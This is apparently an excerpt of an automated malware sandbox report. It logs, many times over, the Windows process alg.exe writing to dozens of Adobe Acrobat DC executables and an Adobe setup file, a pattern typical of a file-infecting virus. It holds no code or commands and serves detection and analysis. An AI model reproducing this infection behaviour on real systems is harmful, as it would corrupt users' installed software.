Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
